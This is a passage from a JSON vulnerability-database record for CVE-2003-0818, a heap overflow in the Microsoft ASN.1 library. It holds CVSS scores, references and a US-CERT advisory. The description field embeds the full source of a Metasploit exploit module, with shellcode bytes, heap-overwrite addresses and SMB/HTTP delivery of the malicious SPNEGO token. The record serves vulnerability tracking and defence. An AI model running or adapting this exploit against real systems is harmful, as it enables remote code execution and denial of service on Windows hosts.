"model": "exchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "exchange server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "exchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:microsoft:windows_2000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_nt",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows_xp",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery of this vulnerability has been credited to eEye Digital Security.",
"sources": [
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0818",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2003-0818",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2003-0818",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#583108",
"trust": 0.8,
"value": "27.72"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#216324",
"trust": 0.8,
"value": "27.72"
},
{
"author": "NVD",
"id": "CVE-2003-0818",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200403-040",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2003-0818",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. \nThis vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. \nIt should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. \nIssues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. \n** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##\n# $Id$\n##\n\n##\n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit\n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/\n##\n\n\nrequire \u0027msf/core\u0027\n\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\n\tinclude Msf::Exploit::Remote::SMB\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t\u0027Name\u0027 =\u003e \u0027Microsoft ASN.1 Library Bitstring Heap Overflow\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\tThis is an exploit for a previously undisclosed\n\t\t\t\tvulnerability in the bit string decoding code in the\n\t\t\t\tMicrosoft ASN.1 library. Both vulnerabilities were fixed in the\n\t\t\t\tMS04-007 patch. \n\n\t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\t\t\t\tthe payload fails to execute, the LSASS system service will\n\t\t\t\tcrash and the target system will automatically reboot itself\n\t\t\t\tin 60 seconds. If the payload succeeeds, the system will no\n\t\t\t\tlonger be able to process authentication requests, denying\n\t\t\t\tall attempts to login through SMB or at the console. A\n\t\t\t\treboot is required to restore proper functioning of an\n\t\t\t\texploited system. \n\t\t\t\t\n\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\t\t\t\tpayloads, however a few problems were encounted when using the\n\t\t\t\tequivalent bind payloads. Your mileage may vary. \n\t\t\t\t\t\n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e [ \u0027Solar Eclipse \u003csolareclipse@phreedom.org\u003e\u0027 ],\n\t\t\t\u0027License\u0027 =\u003e GPL_LICENSE,\n\t\t\t\u0027Version\u0027 =\u003e \u0027$Revision$\u0027,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272003-0818\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u00273902\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u00279633\u0027],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],\n\t\t\t\t\t[ \u0027MSB\u0027, \u0027MS04-007\u0027],\n\n\t\t\t\t],\n\t\t\t\u0027DefaultOptions\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n\t\t\t\t},\t\t\t\t\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Payload\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027Space\u0027 =\u003e 1024,\n\t\t\t\t\t\u0027StackAdjustment\u0027 =\u003e -3500,\n\t\t\t\t},\n\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\u0027Targets\u0027 =\u003e \n\t\t\t\t[\n\t\t\t\t\t[ \n\t\t\t\t\t\t\u0027Windows 2000 SP2-SP4 + Windows XP SP0-SP1\u0027, # Tested OK - 11/25/2005 hdm (bind failed)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\t\t\t},\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Feb 10 2004\u0027,\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0))\n\t\t\t\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOptString.new(\u0027PROTO\u0027, [ true, \"Which protocol to use: http or smb\", \u0027smb\u0027]),\n\t\t\t], self.class)\t\t\t\n\tend\n\n\t# This exploit is too destructive to use during automated exploitation. \n\t# Better Windows-based exploits exist at this time (Sep 2006)\n\tdef autofilter\n\t\tfalse\n\tend\n\n\t# This is a straight port of Solar Eclipse\u0027s \"kill-bill\" exploit, published\n\t# as a Metasploit Framework module with his permission. This module is only\n\t# licensed under GPLv2, keep this in mind if you embed the Framework into\n\t# a non-GPL application. -hdm[at]metasploit.com\n\n\tdef exploit\n\t\n\t\t# The first stage shellcode fixes the PEB pointer and cleans the heap\n\t\tstage0 = \n\t\t\t\"\\x53\\x56\\x57\\x66\\x81\\xec\\x80\\x00\\x89\\xe6\\xe8\\xed\\x00\\x00\\x00\\xff\"+\n\t\t\t\"\\x36\\x68\\x09\\x12\\xd6\\x63\\xe8\\xf7\\x00\\x00\\x00\\x89\\x46\\x08\\xe8\\xa2\"+\n\t\t\t\"\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\x6b\\xd0\\x2b\\xca\\xe8\\xe2\\x00\\x00\\x00\"+\n\t\t\t\"\\x89\\x46\\x0c\\xe8\\x3f\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\xfa\\x97\\x02\\x4c\"+\n\t\t\t\"\\xe8\\xcd\\x00\\x00\\x00\\x31\\xdb\\x68\\x10\\x04\\x00\\x00\\x53\\xff\\xd0\\x89\"+\n\t\t\t\"\\xc3\\x56\\x8b\\x76\\x10\\x89\\xc7\\xb9\\x10\\x04\\x00\\x00\\xf3\\xa4\\x5e\\x31\"+\n\t\t\t\"\\xc0\\x50\\x50\\x50\\x53\\x50\\x50\\xff\\x56\\x0c\\x8b\\x46\\x08\\x66\\x81\\xc4\"+\n\t\t\t\"\\x80\\x00\\x5f\\x5e\\x5b\\xff\\xe0\\x60\\xe8\\x23\\x00\\x00\\x00\\x8b\\x44\\x24\"+\n\t\t\t\"\\x0c\\x8d\\x58\\x7c\\x83\\x43\\x3c\\x05\\x81\\x43\\x28\\x00\\x10\\x00\\x00\\x81\"+\n\t\t\t\"\\x63\\x28\\x00\\xf0\\xff\\xff\\x8b\\x04\\x24\\x83\\xc4\\x14\\x50\\x31\\xc0\\xc3\"+\n\t\t\t\"\\x31\\xd2\\x64\\xff\\x32\\x64\\x89\\x22\\x31\\xdb\\xb8\\x90\\x42\\x90\\x42\\x31\"+\n\t\t\t\"\\xc9\\xb1\\x02\\x89\\xdf\\xf3\\xaf\\x74\\x03\\x43\\xeb\\xf3\\x89\\x7e\\x10\\x64\"+\n\t\t\t\"\\x8f\\x02\\x58\\x61\\xc3\\x60\\xbf\\x20\\xf0\\xfd\\x7f\\x8b\\x1f\\x8b\\x46\\x08\"+\n\t\t\t\"\\x89\\x07\\x8b\\x7f\\xf8\\x81\\xc7\\x78\\x01\\x00\\x00\\x89\\xf9\\x39\\x19\\x74\"+\n\t\t\t\"\\x04\\x8b\\x09\\xeb\\xf8\\x89\\xfa\\x39\\x5a\\x04\\x74\\x05\\x8b\\x52\\x04\\xeb\"+\n\t\t\t\"\\xf6\\x89\\x11\\x89\\x4a\\x04\\xc6\\x43\\xfd\\x01\\x61\\xc3\\xa1\\x0c\\xf0\\xfd\"+\n\t\t\t\"\\x7f\\x8b\\x40\\x1c\\x8b\\x58\\x08\\x89\\x1e\\x8b\\x00\\x8b\\x40\\x08\\x89\\x46\"+\n\t\t\t\"\\x04\\xc3\\x60\\x8b\\x6c\\x24\\x28\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\"+\n\t\t\t\"\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x38\\x49\\x8b\\x34\\x8b\\x01\\xee\"+\n\t\t\t\"\\x31\\xff\\x31\\xc0\\xfc\\xac\\x38\\xe0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\"+\n\t\t\t\"\\xf4\\x3b\\x7c\\x24\\x24\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\"+\n\t\t\t\"\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc2\"+\n\t\t\t\"\\x08\\x00\\xeb\\xfe\"\n\n\t\ttoken = spnego_token(stage0, payload.encoded)\n\t\t\n\t\tcase datastore[\u0027PROTO\u0027]\n\t\t\twhen \u0027smb\u0027\n\t\t\t\texploit_smb(token)\n\t\t\twhen \u0027http\u0027\n\t\t\t\texploit_http(token)\n\t\t\telse\n\t\t\t\tprint_status(\"Invalid application protocol specified, use smb or http\")\n\t\tend\n\tend\n\t\n\t\n\tdef exploit_smb(token)\n\t\tconnect\n\t\t\n\t\tclient = Rex::Proto::SMB::Client.new(sock)\n\n\t\tbegin\n\t\t\tclient.session_request(smb_hostname()) if not datastore[\u0027SMBDirect\u0027]\n\t\t\tclient.negotiate\n\t\t\tclient.session_setup_ntlmv2_blob(token)\n\t\trescue =\u003e e\n\t\t\tif (e.to_s =~ /error code 0x00050001/)\n\t\t\t\tprint_status(\"The target system has already been exploited\")\n\t\t\telse\n\t\t\t\tprint_status(\"Error: #{e}\")\n\t\t\tend\n\t\tend\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\tdef exploit_http(token)\n\t\tconnect\n\t\t\n\t\treq = \"GET / HTTP/1.0\\r\\n\"\n\t\treq \u003c\u003c \"Host: #{ datastore[\u0027RHOST\u0027]}\\r\\n\"\n\t\treq \u003c\u003c \"Authorization: Negotiate #{Rex::Text.encode_base64(token, \u0027\u0027)}\\r\\n\\r\\n\"\n\n\t\tsock.put(req)\n\t\tres = sock.get_once\n\t\t\n\t\tif (res and res =~ /0x80090301/)\n\t\t\tprint_status(\"This server does not support the Negotiate protocol or has already been exploited\")\n\t\tend\n\t\t\n\t\tif (res and res =~ /0x80090304/)\n\t\t\tprint_status(\"This server responded with error code 0x80090304 (wth?)\")\n\t\tend\t\t\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\n\t# Returns an ASN.1 encoded string\n\tdef enc_asn1(str)\n\t\tRex::Proto::SMB::Utils::asn1encode(str)\n\tend\n\n\t# Returns an ASN.1 encoded bit string with 0 unused bits\n\tdef enc_bits(str)\n\t\t\"\\x03\" + enc_asn1(\"\\x00\" + str)\n\tend\n\n\t# Returns a BER encoded constructed bit string\n\tdef enc_constr(*str_arr)\n\t\t\"\\x23\" + enc_asn1(str_arr.join(\u0027\u0027))\n\tend\n\n\t# Returns a BER encoded SPNEGO token\n\tdef spnego_token(stage0, stage1)\n\t\t\n\t\tif !(stage0 and stage1)\n\t\t\tprint_status(\"Invalid parameters passed to spnego_token\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif (stage0.length \u003e 1032)\n\t\t\tprint_status(\"The stage 0 shellcode is longer than 1032 bytes\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\ttag = \"\\x90\\x42\\x90\\x42\\x90\\x42\\x90\\x42\"\n\t\t\n\t\tif ((tag.length + stage1.length) \u003e 1033)\n\t\t\tprint_status(\"The stage 1 shellcode is too long\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\t\n\t\t# The first two overwrites must succeed, so we write to an unused location\n\t\t# in the PEB block. We don\u0027t care about the values, because after this the\n\t\t# doubly linked list of free blocks is corrupted and we get to the second\n\t\t# overwrite which is more useful. \n\n\t\tfw = \"\\xf8\\x0f\\x01\\x00\"\t\t# 0x00010ff8\n\t\tbk = \"\\xf8\\x0f\\x01\"\n\t\t\t\t\n\t\t# The second overwrite writes the address of our shellcode into the\n\t\t# FastPebLockRoutine pointer in the PEB\n\n\t\tpeblock = \"\\x20\\xf0\\xfd\\x7f\" # FastPebLockRoutine in PEB\n\t\t\t\n\t\tbitstring = enc_constr( \n\t\t\tenc_bits(\"A\" * 1024),\n\t\t\t\"\\x03\\x00\",\n\t\t\tenc_constr(\n\t\t\t\tenc_bits(tag + stage1 + (\"B\" * (1033-(tag+stage1).length))),\n\t\t\t\tenc_constr( enc_bits(fw + bk) ),\n\t\t\t\tenc_constr(\n\t\t\t\t\tenc_bits(\"CCCC\" + peblock + stage0 + (\"C\" * (1032-stage0.length))),\n\t\t\t\t\tenc_constr(\n\t\t\t\t\t\tenc_bits(\"\\xeb\\x06\" + make_nops(6)),\n\t\t\t\t\t\tenc_bits(\"D\" * 1040)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\ttoken = \"\\x60\" + enc_asn1( # Application Constructed Object\n\t\t\t\"\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\" + # SPNEGO OID\n\t\t\t\"\\xa0\" + enc_asn1(\t\t\t\t\t # NegTokenInit (0xa0)\n\t\t\t\t\"\\x30\" + enc_asn1(\n\t\t\t\t\t\"\\xa1\" + enc_asn1(\n\t\t\t\t\t\tbitstring\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\treturn token\t\n\tend\n\nend\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nMultiple Vulnerabilities in Microsoft ASN.1 Library\n\n Original issue date: February 10, 2004\n Last revised: --\n Source: US-CERT\n\n A complete revision history is at the end of this document. According to information from eEye Digital Security,\n the vulnerabilities involve integer overflows and other flaws in\n integer arithmetic. \n\n Any application that loads the ASN.1 library could serve as an attack\n vector. In particular, ASN.1 is used by a number of cryptographic and\n authentication services such as digital certificates (x.509),\n Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are\n affected. The Local Security Authority Subsystem (lsass.exe) and a\n component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1\n library. \n\nSolution\n\nApply a patch\n\n Apply the appropriate patch as specified by Microsoft Security\n Bulletin MS04-007. \n\nVendor Information\n\n This appendix contains information provided by vendors. When vendors\n report new information, this section is updated and the changes are\n noted in the revision history. If a vendor is not listed below, we\n have not received their comments. \n\nMicrosoft\n\n Please see Microsoft Security Bulletin MS04-007. \n\nReferences\n\n * Vulnerability Note VU#216324 -\n \u003chttp://www.kb.cert.org/vuls/id/216324\u003e\n * Vulnerability Note VU#583108 -\n \u003chttp://www.kb.cert.org/vuls/id/583108\u003e\n * eEye Digital Security Advisory AD20040210 -\n \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210.html\u003e\n * eEye Digital Security Advisory AD20040210-2 -\n \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210-2.html\u003e\n * Microsoft Security Bulletin MS04-007 -\n \u003chttp://microsoft.com/technet/security/bulletin/MS04-007.asp\u003e\n * Microsoft Knowledge Base Article 252648 -\n \u003chttp://support.microsoft.com/default.aspx?scid=252648\u003e\n _________________________________________________________________\n\n These vulnerabilities were researched and reported by eEye Digital\n Security. Information from eEye and Microsoft was used in this\n document. \n _________________________________________________________________\n\n Feedback can be directed to the author, Art Manion. \n\n Copyright 2004 Carnegie Mellon University. \n\n Revision History\n\n February 10, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW\n5hU8LQ/oOC4sI8PpnkppCyg=\n=Oe/N\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0818"
},
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
}
],
"trust": 4.14
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=153",
"trust": 0.3,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0818"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#583108",
"trust": 4.0
},
{
"db": "NVD",
"id": "CVE-2003-0818",
"trust": 3.5
},
{
"db": "CERT/CC",
"id": "VU#216324",
"trust": 2.9
},
{
"db": "USCERT",
"id": "TA04-041A",
"trust": 2.6
},
{
"db": "BID",
"id": "13300",
"trust": 1.2
},
{
"db": "BID",
"id": "9635",
"trust": 1.1
},
{
"db": "XF",
"id": "15039",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040",
"trust": 0.6
},
{
"db": "BID",
"id": "9633",
"trust": 0.3
},
{
"db": "EXPLOIT-DB",
"id": "153",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2003-0818",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "83044",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32667",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"id": "VAR-200403-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2025-04-03T20:57:29.374000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS04-007",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx"
},
{
"title": "MS04-007",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/nitishbadole/oscp-note-2 "
},
{
"title": "OSCP",
"trust": 0.1,
"url": "https://github.com/H3n2yk/OSCP "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/rmsbpro/rmsbpro "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "http://www.kb.cert.org/vuls/id/583108"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html"
},
{
"trust": 2.0,
"url": "http://www.kb.cert.org/vuls/id/216324"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=ntbugtraq\u0026m=107650972617367\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=107643892224825\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=107643836125615\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=ntbugtraq\u0026m=107650972723080\u0026w=2"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms04-007.asp"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/default.aspx?scid=252648"
},
{
"trust": 1.6,
"url": "http://www.itu.int/itu-t/asn1/"
},
{
"trust": 1.6,
"url": "http://www.asn1.org/"
},
{
"trust": 1.4,
"url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/bid/13300"
},
{
"trust": 0.9,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp"
},
{
"trust": 0.9,
"url": "/archive/1/354227"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20040210.html"
},
{
"trust": 0.8,
"url": "http://www.ciac.org/ciac/bulletins/o-065.shtml"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818"
},
{
"trust": 0.8,
"url": "http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/15039"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/wr/2004/wr040701.txt"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/at/2004/at040001.txt"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta04-041a/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta04-041a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/9635"
},
{
"trust": 0.8,
"url": "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf"
},
{
"trust": 0.8,
"url": "http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html"
},
{
"trust": 0.8,
"url": "http://www.cyberpolice.go.jp/important/20040211_084159.html"
},
{
"trust": 0.3,
"url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/"
},
{
"trust": 0.3,
"url": "http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html"
},
{
"trust": 0.3,
"url": "/archive/1/353320"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/153/"
},
{
"trust": 0.1,
